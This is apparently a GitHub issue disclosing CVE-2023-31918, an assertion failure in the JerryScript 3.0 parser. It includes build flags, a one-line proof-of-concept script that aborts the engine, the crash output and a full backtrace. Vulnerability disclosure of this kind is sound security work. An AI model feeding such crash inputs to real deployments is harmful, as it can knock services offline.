Headline
CVE-2023-31918: Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at jerryscript/jerry-core/parser/js/js-parser.c(parser_parse_function_arguments) · Issue #5064 · jerryscript-project/je
Jerryscript 3.0 (commit 1a2c047) was discovered to contain an Assertion Failure via the parser_parse_function_arguments at jerry-core/parser/js/js-parser.c.
JerryScript revision
Commit: 1a2c047
Version: v3.0.0
Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
Build steps
python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20
Test case
// poc.js class C { async#* method (
Execution steps & Output
$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at jerryscript/jerry-core/parser/js/js-parser.c(parser_parse_function_arguments):1587.
Error: JERRY_FATAL_FAILED_ASSERTION
Aborted
Backtrace
#0 0xf7fcfd99 in __kernel_vsyscall ()
#1 0xf7ca4276 in raise () from /lib32/libc.so.6
#2 0xf7c8c3f7 in abort () from /lib32/libc.so.6
#3 0x083ecca3 in jerry_port_fatal (code=JERRY_FATAL_FAILED_ASSERTION) at jerryscript/jerry-port/common/jerry-port-process.c:29
#4 0x08260d02 in jerry_fatal (code=JERRY_FATAL_FAILED_ASSERTION) at jerryscript/jerry-core/jrt/jrt-fatals.c:63
#5 0x08260d64 in jerry_assert_fail (assertion=0x84433e0 <str> "context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION",
file=0x8442ec0 <str> "jerryscript/jerry-core/parser/js/js-parser.c",
function=0x8443440 <__func__.parser_parse_function_arguments> "parser_parse_function_arguments", line=1587)
at jerryscript/jerry-core/jrt/jrt-fatals.c:83
#6 0x0827592c in parser_parse_function_arguments (context_p=0xffffcd30, end_type=<optimized out>)
at jerryscript/jerry-core/parser/js/js-parser.c:1587
#7 0x0827240a in parser_parse_function (context_p=<optimized out>, status_flags=<optimized out>) at jerryscript/jerry-core/parser/js/js-parser.c:2685
#8 0x08399b84 in lexer_construct_function_object (context_p=0xffffcd30, extra_status_flags=34717702)
at jerryscript/jerry-core/parser/js/js-lexer.c:2695
#9 0x083a30d3 in parser_parse_class_body (context_p=<optimized out>, opts=<optimized out>, class_name_index=0)
at jerryscript/jerry-core/parser/js/js-parser-expr.c:908
#10 parser_parse_class (context_p=<optimized out>, is_statement=<optimized out>) at jerryscript/jerry-core/parser/js/js-parser-expr.c:1110
#11 0x083c9959 in parser_parse_statements (context_p=<optimized out>) at jerryscript/jerry-core/parser/js/js-parser-statm.c:2787
#12 0x08284a26 in parser_parse_source (source_p=0xffffd030, parse_opts=<optimized out>, options_p=0xffffd100)
at jerryscript/jerry-core/parser/js/js-parser.c:2280
#13 0x08282c70 in parser_parse_script (source_p=0xffffd030, parse_opts=0, options_p=0xffffd100) at jerryscript/jerry-core/parser/js/js-parser.c:3326
#14 0x08129a7d in jerry_parse_common (source_p=0xffffd030, options_p=<optimized out>, parse_opts=0) at jerryscript/jerry-core/api/jerryscript.c:412
#15 0x08129698 in jerry_parse (source_p=<optimized out>, source_size=<optimized out>, options_p=<optimized out>)
at jerryscript/jerry-core/api/jerryscript.c:480
#16 0x083ea952 in jerryx_source_parse_script (path_p=<optimized out>) at jerryscript/jerry-ext/util/sources.c:52
#17 0x083eac12 in jerryx_source_exec_script (path_p=0xffffd5e0 "poc.js") at jerryscript/jerry-ext/util/sources.c:63
#18 0x0812162d in main (argc=<optimized out>, argv=<optimized out>) at jerryscript/jerry-main/main-desktop.c:156
Credits:
@Ye0nny, @EJueon of the seclab-yonsei.